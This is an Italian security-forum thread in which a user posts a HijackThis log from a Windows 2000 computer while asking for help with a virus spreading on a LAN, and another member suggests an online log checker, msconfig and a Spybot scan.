R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Malicious Scripts Scanner - {55EA1964-F5E4-4D6A-B9B2-125B37655FCB} - C:\Documents and Settings\All Users\Dati applicazioni\Prevx\pxbho.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programmi\Java\jre1.5.0_06\bin\ssv.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [IgfxTray] C:\WINNT\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINNT\System32\hkcmd.exe
O4 - HKLM\..\Run: [ShStatEXE] "C:\Programmi\Network Associates\VirusScan\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "C:\Programmi\Network Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [Network Associates Error Reporting Service] "C:\Programmi\File comuni\Network Associates\TalkBack\TBMon.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programmi\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programmi\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKLM\..\Run: [TalkAndWrite] C:\Documents and Settings\All Users\Dati applicazioni\Skype\Plugins\Plugins\1163D2B46CC742E5A3CC9E4157887751\TalkAndWrite.exe /run
O4 - HKLM\..\Run: [PCSuiteTrayApplication] C:\Programmi\Nokia\Nokia PC Suite 6\LaunchApplication.exe -startup
O4 - HKLM\..\Run: [aol] "C:\Programmi\AOL\Active Virus Shield\avp.exe"
O4 - HKLM\..\Run: [PrevxOne] "C:\Programmi\Prevx1\PXConsole.exe"
O4 - HKCU\..\Run: [Skype] "C:\Programmi\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [MsnMsgr] "C:\Programmi\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [VoipStunt] "C:\programmi\voipstunt.com\voipstunt\voipstunt.exe" -nosplash -minimized
O4 - HKCU\..\Run: [skypho.exe] "C:\Programmi\skypho\skypho\skypho.exe"
O4 - HKCU\..\Run: [updateMgr] "C:\Programmi\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_8 -reboot 1
O4 - HKCU\..\Run: [googletalk] "C:\Programmi\Google\Google Talk\googletalk.exe" /autostart
O4 - Global Startup: as400.lnk = C:\as400.bat
O4 - Global Startup: BlueSoleil.lnk = C:\Programmi\IVT Corporation\BlueSoleil\BlueSoleil.exe
O4 - Global Startup: CopiaMdw2000.lnk = ProtAcc\CopiaMdw2000.bat
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.5.0_06\bin\ssv.dll
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/ms ... b31267.cab
O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Me ... b31267.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupda ... 8313685359
O16 - DPF: {7F8C8173-AD80-4807-AA75-5672F22B4582} (ICSScanner Class) - http://download.zonelabs.com/bin/promot ... 371050.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Me ... b31267.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZI ... b47946.cab
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CCS\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: Domain = ********
O17 - HKLM\System\CCS\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ********
O17 - HKLM\System\CS1\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: Domain = ********
O17 - HKLM\System\CS1\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = ********
O17 - HKLM\System\CS2\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: Domain = ********
O17 - HKLM\System\CS2\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ********
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FILECO~1\Skype\SKYPE4~1.DLL
O20 - Winlogon Notify: igfxcui - C:\WINNT\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: klogon - C:\WINNT\system32\klogon.dll
O23 - Service: Active Virus Shield (AVP) - Unknown owner - C:\Programmi\AOL\Active Virus Shield\avp.exe" -r (file missing)
O23 - Service: BlueSoleil Hid Service - Unknown owner - C:\Programmi\IVT Corporation\BlueSoleil\BTNtService.exe
O23 - Service: Comando remoto iSeries Access per Windows (Cwbrxd) - IBM Corporation - C:\WINNT\CWBRXD.EXE
O23 - Service: Servizio amministrativo di Gestione disco logico (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmi\File comuni\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Servizio di framework di McAfee (McAfeeFramework) - Network Associates, Inc. - C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
O23 - Service: Network Associates McShield (McShield) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\Mcshield.exe
O23 - Service: Network Associates Task Manager (McTaskManager) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx1\PXAgent.exe" -f (file missing)
O23 - Service: ServiceLayer - Nokia. - C:\Programmi\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: spkrmon - Unknown owner - C:\Programmi\Analog Devices\SoundMAX\spkrmon.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file missing)


Qualcuno ha qualche idea? :undecided:
Grazie assai.
Padrino
padrino
Newbie
 
Post: 7
Iscritto il: 29/08/06 01:12
Località: Messina

Postdi Mikele46 » 09/05/07 11:53

allora per controllare il log vai su http://www.hijackthis.de/it perchè hai alcune applicazioni che non conosco e molte voici da eliminare....poi....non so se può essere utile ma puoi controllare in msconfig (scrivilo nell'esegui) se ci sono programmi sconosciuti che si eseguono automaticamente poi ti consiglio una scansione con spy-bot
Immagine
Avatar utente
Mikele46
Utente Senior
 
Post: 521
Iscritto il: 20/08/06 15:16
Località: Napoli


Torna a Sicurezza e Privacy


Topic correlati a "Virus malefico che si propaga in una lan.":

Virus o cosa?
Autore: danibi60
Forum: Sicurezza e Privacy
Risposte: 26

Chi c’è in linea

Visitano il forum: Nessuno e 32 ospiti